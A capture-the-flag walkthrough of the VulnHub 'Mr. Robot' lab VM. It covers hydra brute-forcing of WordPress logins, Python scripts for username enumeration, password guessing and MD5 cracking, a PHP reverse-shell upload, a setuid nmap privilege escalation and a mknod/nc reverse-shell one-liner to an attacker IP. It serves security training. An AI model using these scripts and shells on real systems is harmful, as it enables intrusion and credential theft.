Difficulty Rating:

Machine: Mr.Robot 1
OS: Linux
Target IP: 10.10.10.129

Introduction

This machine is based on the popular show Mr. Robot. It has three keys hidden in different locations, and the goal is to find all three. Each key is a bit harder to find than the previous one. Hope you enjoy this walkthrough!

  • Nmap
    Let’s use nmap to scan for open TCP services.

  • Flags used for nmap

Flag   Description
-A     Aggressive scan: enables OS detection (-O), version detection (-sV), default scripts (-sC) and traceroute
-Pn    Skip host discovery and treat the host as up; useful when ICMP is filtered (the -sC in the command below is redundant, since -A already implies it)
-oN    Store output in a text file in nmap's normal format
# Nmap 7.60 scan initiated Tue Jan  2 19:35:43 2018 as: nmap -A -sC -Pn -oN nmap_mrRobot.txt 10.10.10.129
Nmap scan report for 10.10.10.129
Host is up (0.00084s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 00:0C:29:85:AB:3A (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.84 ms 10.10.10.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan  2 19:36:19 2018 -- 1 IP address (1 host up) scanned in 35.37 seconds
  • Ports 80 and 443 are open. Port 22 is reported closed rather than filtered, so there is no SSH to attack; the web server is the whole attack surface.

  • Nikto

- Nikto v2.1.6/2.1.5
+ Target Host: 10.10.10.129
+ Target Port: 80
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Retrieved x-powered-by header: PHP/5.5.29
+ GET Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ GET Uncommon header 'tcn' found, with contents: list
+ GET Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: GET /admin/: This might be interesting...
+ GET Uncommon header 'link' found, with contents: <http://10.10.10.129/?p=23>; rel=shortlink
+ GET /wp-login/: Admin login page/section found.
+ GET /wordpress/: A Wordpress installation was found.
+ GET /wp-admin/wp-login.php: Wordpress login found
+ GET /blog/wp-login.php: Wordpress login found
+ GET /wp-login.php: Wordpress login found
  • Let’s check /robots.txt

[screenshot: contents of /robots.txt]

  • robots.txt lists two more paths to fetch:
    • fsocity.dic
    • key-1-of-3.txt
  • /key-1-of-3.txt gives us the first key, out of 3 keys.

[screenshot: /key-1-of-3.txt]

First key found!!
  • /fsocity.dic looks like a wordlist, which we can use later.
  • It contains a lot of repeated entries. Let's sort it and make a new wordlist with only the unique words.
root@<attacker>:~/Vulnhub/mrRobot# cat fsocity.dic | wc -l
858160
root@<attacker>:~/Vulnhub/mrRobot# cat fsocity.dic | sort -u | wc -l
11451
root@<attacker>:~/Vulnhub/mrRobot# cat fsocity.dic | sort -u > fsocity.dic.uniq
  • Let's try to log in. Visit 10.10.10.129/wp-login.php
  • Let's use the fsocity.dic.uniq wordlist to find a valid username first, and then use the same dictionary to brute-force the password.
  • Username brute-force
    To find the username we use hydra with fsocity.dic.uniq as the username list and an arbitrary fixed password. The WordPress login page is a username oracle: an unknown username gets the error "Invalid username", while a known username with a wrong password gets a different error saying the password "is incorrect". With F=Invalid username as the failure string, hydra reports every username that does not produce that message as a hit, which is exactly the list of valid accounts (the password printed next to them is just the probe value, not a real credential).
root@<attacker>:~/Vulnhub/mrRobot# hydra -L fsocity.dic.uniq -p dontknow 10.10.10.129 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username' -t 64
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 13:06:07
[DATA] max 64 tasks per 1 server, overall 64 tasks, 11452 login tries (l:11452/p:0), ~1 tries per task
[DATA] attacking http-post-form://10.10.10.129:80//wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username
[STATUS] 2220.00 tries/min, 2220 tries in 00:00h, 0 to do in 01:00h, 9232 active
[80][http-post-form] host: 10.10.10.129   login: ELLIOT   password: dontknow
[80][http-post-form] host: 10.10.10.129   login: Elliot   password: dontknow
[STATUS] 2305.33 tries/min, 6916 tries in 00:00h, 0 to do in 03:00h, 4536 active
[80][http-post-form] host: 10.10.10.129   login: elliot   password: dontknow
[STATUS] 2258.25 tries/min, 9033 tries in 00:00h, 0 to do in 04:00h, 2419 active
[STATUS] 2265.60 tries/min, 11328 tries in 00:00h, 0 to do in 05:00h, 124 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-03 13:11:11

Flags used for hydra

Flag            Description
-L              Wordlist for usernames
-l              Single username
-p              Single password
-P              Wordlist for passwords
http-post-form  Module for a login form submitted via POST; its argument is "path:post-body:F=failure-string", with ^USER^ and ^PASS^ substituted on every attempt
F=<string>      String whose presence in the response marks a failed attempt; a response without it is reported as a valid login
-t              Number of parallel connections (tasks) per target
  • Password bruteforce
    Now that we have the username, keep it fixed and brute-force the password with fsocity.dic.uniq. The failure string changes to "is incorrect", the message a valid user gets for a wrong password; a successful login returns a redirect to the dashboard instead of that error.
root@<attacker>:~/Vulnhub/mrRobot# hydra -l elliot -P fsocity.dic.uniq 10.10.10.129 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect' -t 64
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 13:11:57
[DATA] max 64 tasks per 1 server, overall 64 tasks, 11452 login tries (l:1/p:0), ~11452 tries per task
[DATA] attacking http-post-form://10.10.10.129:80//wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect
[STATUS] 2084.00 tries/min, 2084 tries in 00:00h, 0 to do in 01:00h, 9368 active
[80][http-post-form] host: 10.10.10.129   login: elliot   password: ER28-0652
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 64 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-03 13:13:57
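The two hydra runs above depend on one thing: the login page answering differently for a wrong username than for a wrong password. The following script is an added example (not part of the original write-up, which uses hydra) that makes that classifier explicit and then performs both stages, first enumerating usernames with a throwaway password and then guessing the password for each user found. The target URL and probe password are taken from the write-up; the SAMPLE_* responses are constructed, modelled on the WordPress error strings, so the classifier can be exercised without the VM.

```python
"""
Username enumeration against the WordPress login form, then password guessing
for the user found. Added example, not from the original write-up.
Assumptions: TARGET and PROBE_PASSWORD come from the write-up; the SAMPLE_*
responses are constructed, not captured from the box.
"""
import urllib.error
import urllib.parse
import urllib.request

TARGET = "http://10.10.10.129/wp-login.php"   # assumption: lab target from the write-up
PROBE_PASSWORD = "dontknow"                    # any string; only the username matters in stage one


def classify_login(status, headers, body):
    """Tell what one wp-login.php response says about the submitted credentials.

    This WordPress leaks username validity through its error text:
      unknown user            -> 200, body contains "Invalid username"
      known user, wrong pass  -> 200, body contains "... is incorrect"
      correct credentials     -> 302 redirect into /wp-admin/
    """
    location = next((v for k, v in headers.items() if k.lower() == "location"), "")
    if status in (301, 302) and "wp-admin" in location:
        return "success"
    if "Invalid username" in body:
        return "invalid_username"
    if "is incorrect" in body:
        return "bad_password"
    return "unknown"


def dedupe_wordlist(lines):
    """What `sort -u` did to fsocity.dic: strip, drop blanks, keep one copy of each word."""
    return sorted({line.strip() for line in lines if line.strip()})


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep the 302 instead of following it; the redirect target is the success signal."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def post_login(url, username, password, timeout=5):
    """Submit the form exactly as hydra does (log, pwd, wp-submit); return (status, headers, body)."""
    data = urllib.parse.urlencode(
        {"log": username, "pwd": password, "wp-submit": "Log In"}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:      # a 302 surfaces here once redirects are off
        return err.code, dict(err.headers), err.read().decode("utf-8", "replace")


def enumerate_users(url, candidates, probe_password=PROBE_PASSWORD):
    """Stage one: usernames whose wrong-password response differs from the unknown-user one."""
    return [u for u in candidates
            if classify_login(*post_login(url, u, probe_password)) in ("bad_password", "success")]


def guess_password(url, username, candidates):
    """Stage two: fixed username, walk the wordlist until the login redirects."""
    for pw in candidates:
        if classify_login(*post_login(url, username, pw)) == "success":
            return pw
    return None


# Constructed sample responses (not captured from the box) for offline checks.
SAMPLE_INVALID_USER = (200, {"Content-Type": "text/html"},
                       '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>')
SAMPLE_BAD_PASSWORD = (200, {"Content-Type": "text/html"},
                       '<div id="login_error"><strong>ERROR</strong>: The password you entered '
                       'for the username <strong>elliot</strong> is incorrect.</div>')
SAMPLE_SUCCESS = (302, {"Location": "http://10.10.10.129/wp-admin/"}, "")

if __name__ == "__main__":
    # Constructed mini wordlist; on the box this would be the lines of fsocity.dic.
    words = dedupe_wordlist(["Elliot", "elliot", "elliot", "", "ELLIOT", "mrrobot"])
    try:
        users = enumerate_users(TARGET, words)
        print("valid usernames:", users)
        for user in users:
            print(user, "->", guess_password(TARGET, user, words))
    except urllib.error.URLError as err:
        print("target not reachable:", err.reason)
```

Hydra's F= check is the same idea as classify_login, only less explicit: anything without the failure string counts as a hit, which is why the first run "found" three usernames with the password dontknow. The fix on the defending side is to return the same generic error for both cases (and to rate-limit wp-login.php), which removes the oracle this script depends on.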
  • Visit 10.10.10.129/wp-login.php with the creds we found:
    • Username: elliot
    • Password: ER28-0652
  • We see the WordPress dashboard.
  • After playing around, I found that it is possible to install a plugin, which means elliot has administrator rights. So I installed the File Manager plugin to upload my payload.

[screenshot: installing the File Manager plugin]

  • Open File Manager. Only wp-content is readable and writable by the web server user, so that is where the payload has to go.

[screenshot: File Manager showing the permissions on wp-content]

  • Upload a PHP payload to wp-content.
  • For the payload you can use Pentestmonkey's php-reverse-shell. Set its $ip to the attacker's address (10.10.10.128 here) and $port to the listener port (1234) before uploading.
  • Start a netcat listener to receive the reverse TCP connection, then request the uploaded file under http://10.10.10.129/wp-content/ in a browser to trigger it.
root@<attacker>:~/Vulnhub/mrRobot# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.129] 39673
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 03:12:56 up  2:32,  0 users,  load average: 0.02, 0.04, 0.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/bash");'
daemon@linux:/$ ^Z
[1]+  Stopped                 nc -nvlp 1234
root@<attacker>:~/Vulnhub/mrRobot# stty raw -echo
root@<attacker>:~/Vulnhub/mrRobot# nc -nvlp 1234
  • The shell runs as daemon, the web server user, and has no tty ("can't access tty; job control turned off"), so we upgrade it: spawn a pty with python, background nc with Ctrl-Z, put the local terminal into raw mode with echo off, and bring nc back with fg. Because echo is off the typed fg does not appear; the "nc -nvlp 1234" after the last prompt is the job name printed by the shell. From here on Ctrl-C, tab completion and programs that insist on a terminal (su among them) work.

daemon@linux:/$ pwd
/
daemon@linux:/$ ls -la /home
total 12
drwxr-xr-x  3 root root 4096 Nov 13  2015 .
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
drwxr-xr-x  2 root root 4096 Nov 13  2015 robot
daemon@linux:/$ cd /home/robot/
daemon@linux:/home/robot$ ls -la
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
daemon@linux:/home/robot$ file password.raw-md5
password.raw-md5: ASCII text
daemon@linux:/home/robot$ more password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
daemon@linux:/home/robot$ su robot
Password:
robot@linux:~$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
Second key found!!
  • c3fcd3d76192e4007dfb496cca67e13b is an unsalted MD5 hash, as the file name password.raw-md5 suggests.
  • It cracks to abcdefghijklmnopqrstuvwxyz (for example with hashcat -m 0, john --format=raw-md5, or an online lookup; it is also the MD5 test vector for the alphabet in RFC 1321), which is the password for the user robot and what was typed at the su prompt above. su only works here because the shell was upgraded to a full tty first.
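The write-up does not show how the hash was cracked, so here is an added example (not the author's code) that does offline what `hashcat -m 0 password.raw-md5 fsocity.dic.uniq` would do: parse the user:hash file, hash each candidate once, and match it against every digest at the same time. The file content is the line printed above; the candidate list is constructed for the offline run and on the box would be fsocity.dic.uniq.

```python
"""
Dictionary attack on /home/robot/password.raw-md5. Added example, not from the
write-up. RAW_MD5_FILE is the line shown above; CANDIDATES is a constructed
stand-in for fsocity.dic.uniq.
"""
import hashlib

# Copy of the file as printed in the shell session above.
RAW_MD5_FILE = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"

# Constructed candidates for the offline run; the real run reads fsocity.dic.uniq.
CANDIDATES = ["password", "mrrobot", "ER28-0652", "abcdefghijklmnopqrstuvwxyz", "fsociety"]

HEXDIGITS = set("0123456789abcdef")


def parse_raw_md5(text):
    """Parse user:hexdigest lines into {user: digest}; skip anything that is not a 32-hex MD5."""
    creds = {}
    for line in text.splitlines():
        user, sep, digest = line.partition(":")
        digest = digest.strip().lower()
        if sep and len(digest) == 32 and set(digest) <= HEXDIGITS:
            creds[user.strip()] = digest
    return creds


def crack_raw_md5(creds, candidates):
    """Hash every candidate once and check it against all digests at the same time.

    Unsalted MD5 makes this cheap: one hash per candidate regardless of how many
    users are in the file, which is exactly why raw MD5 is unacceptable for
    password storage (a salted, slow KDF forces one hash per candidate per user).
    """
    by_digest = {digest: user for user, digest in creds.items()}
    cracked = {}
    for pw in candidates:
        digest = hashlib.md5(pw.encode()).hexdigest()
        if digest in by_digest:
            cracked[by_digest[digest]] = pw
            if len(cracked) == len(creds):
                break                      # every user cracked, stop early
    return cracked


def crack_file(text, wordlist_path=None):
    """Candidates from a wordlist file when given (e.g. fsocity.dic.uniq), else the constructed list."""
    if wordlist_path:
        with open(wordlist_path, encoding="utf-8", errors="replace") as fh:
            candidates = [line.rstrip("\n") for line in fh]
    else:
        candidates = CANDIDATES
    return crack_raw_md5(parse_raw_md5(text), candidates)


if __name__ == "__main__":
    print(crack_file(RAW_MD5_FILE))
```

On the box, `crack_file(RAW_MD5_FILE, "fsocity.dic.uniq")` reuses the same wordlist the hydra runs used; the dictionary from robots.txt is handed to you for a reason.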

  • Privilege Escalation for root
robot@linux:~$ find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/null
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 69120 Feb 12  2015 /bin/umount
-rwsr-xr-x 1 root root 94792 Feb 12  2015 /bin/mount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 36936 Feb 17  2014 /bin/su
-rwsr-xr-x 1 root root 47032 Feb 17  2014 /usr/bin/passwd
-rwsr-xr-x 1 root root 32464 Feb 17  2014 /usr/bin/newgrp
-rwsr-xr-x 1 root root 41336 Feb 17  2014 /usr/bin/chsh
-rwsr-xr-x 1 root root 46424 Feb 17  2014 /usr/bin/chfn
-rwsr-xr-x 1 root root 68152 Feb 17  2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 155008 Mar 12  2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 440416 May 12  2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
-r-sr-xr-x 1 root root 9532 Nov 13  2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 10344 Feb 25  2015 /usr/lib/pt_chown
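Spotting the odd entry in a list of seventeen setuid binaries is easy by eye; the script below is an added example (not part of the original write-up) that does the same triage mechanically: parse the ls -ld lines, keep the setuid-root ones, and rank each by whether it sits outside the packaged system paths, whether it is missing from a baseline of stock setuid binaries, and whether it is a binary with a known shell escape. The baseline (stock Ubuntu 14.04) and the shell-escape table (GTFOBins-style) are my own assumptions; the sample listing is a subset of the find output above.

```python
"""
Triage of `find / -perm -4000 -user root -exec ls -ld {} \;` output.
Added example, not from the write-up. STOCK_SUID and SHELL_ESCAPES are assumed
reference data; SAMPLE_LISTING is copied from the find output above.
"""
import os

# Assumed baseline: setuid-root binaries present on a stock Ubuntu 14.04 install.
STOCK_SUID = {
    "/bin/ping", "/bin/ping6", "/bin/su", "/bin/mount", "/bin/umount",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Binaries that hand out a shell when setuid (GTFOBins-style). Assumed, not from the page.
SHELL_ESCAPES = {
    "nmap": "old versions: nmap --interactive, then !sh",
    "find": "find . -exec /bin/sh -p \\; -quit",
    "vim": "vim -c ':!/bin/sh -p'",
    "bash": "bash -p",
    "python": "python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
    "less": "less /etc/profile, then !/bin/sh",
}

# Directories where a setuid-root file is almost never legitimate.
SUSPECT_PREFIXES = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


def parse_ls_ld(line):
    """Split one `ls -ld` line into (mode, owner, group, path); None for lines that are not one."""
    parts = line.strip().split(None, 8)
    if len(parts) != 9 or len(parts[0]) != 10:
        return None
    mode, _links, owner, group, _size, _month, _day, _year, path = parts
    return mode, owner, group, path


def is_setuid_root(mode, owner):
    # setuid shows as 's' (or 'S' when the owner-execute bit is clear) in the fourth mode column.
    return owner == "root" and mode[3] in "sS"


def triage(listing):
    """Rank setuid-root binaries; returns (priority, path, reason) tuples, highest priority first."""
    findings = []
    for line in listing.splitlines():
        parsed = parse_ls_ld(line)
        if not parsed:
            continue
        mode, owner, _group, path = parsed
        if not is_setuid_root(mode, owner):
            continue
        reasons, priority = [], 0
        name = os.path.basename(path)
        if name in SHELL_ESCAPES:
            reasons.append("known shell escape: " + SHELL_ESCAPES[name])
            priority += 2
        if path.startswith(SUSPECT_PREFIXES):
            reasons.append("lives outside the packaged system paths")
            priority += 1
        if path not in STOCK_SUID:
            reasons.append("not in the stock setuid baseline")
            priority += 1
        if reasons:
            findings.append((priority, path, "; ".join(reasons)))
    return sorted(findings, reverse=True)


# Subset of the find output above (the write-up's data, not constructed).
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 69120 Feb 12  2015 /bin/umount
-rwsr-xr-x 1 root root 94792 Feb 12  2015 /bin/mount
-rwsr-xr-x 1 root root 36936 Feb 17  2014 /bin/su
-rwsr-xr-x 1 root root 155008 Mar 12  2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 440416 May 12  2014 /usr/lib/openssh/ssh-keysign
-r-sr-xr-x 1 root root 14320 Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 10344 Feb 25  2015 /usr/lib/pt_chown
"""

if __name__ == "__main__":
    for priority, path, reason in triage(SAMPLE_LISTING):
        print(priority, path, "-", reason)
```

On this listing nmap scores on all three counts (escape known, under /usr/local, not stock) and the VMware wrapper only on the baseline check, which is the right order to look at them in. Feed the function the real find output instead of SAMPLE_LISTING when using it on a target.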
  • Everything in that list is a stock Ubuntu setuid binary except /usr/local/bin/nmap (and the VMware tools wrapper). A setuid-root nmap is the way to root.
  • This is nmap 3.81, an old version that still has the --interactive flag. At the interactive prompt, ! runs a shell command, and because the binary is setuid root the command runs with euid 0. Note in the id output below that the real uid stays 1002: setuid changes only the effective uid, so anything that checks the real uid still sees robot, but reading /root needs only euid 0.
  • Get a reverse TCP connection with root's shell
robot@linux:~$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> ! id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
waiting to reap child : No child processes
nmap> !whoami
root
waiting to reap child : No child processes
nmap> !cat /tmp/reverse-tcp.sh
mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc 10.10.10.128 8989 1> /tmp/backpipe; rm /tmp/backpipe
waiting to reap child : No child processes
nmap> !mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc 10.10.10.128 8989 1> /tmp/backpipe; rm /tmp/backpipe
  • Netcat on the attacker side (started before running the command above). The named pipe created with mknod feeds nc's output into /bin/sh's stdin and sh's output back into nc, which is what turns a single TCP connection into a two-way shell; the pipe is removed once the shell exits.
root@<attacker>:~/Vulnhub/mrRobot# nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.129] 53273
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
ls -la /root
total 32
drwx------  3 root root 4096 Nov 13  2015 .
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
-rw-------  1 root root 4058 Nov 14  2015 .bash_history
-rw-r--r--  1 root root 3274 Sep 16  2015 .bashrc
drwx------  2 root root 4096 Nov 13  2015 .cache
-rw-r--r--  1 root root    0 Nov 13  2015 firstboot_done
-r--------  1 root root   33 Nov 13  2015 key-3-of-3.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-------  1 root root 1024 Sep 16  2015 .rnd
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Third key found!!

Share the fun!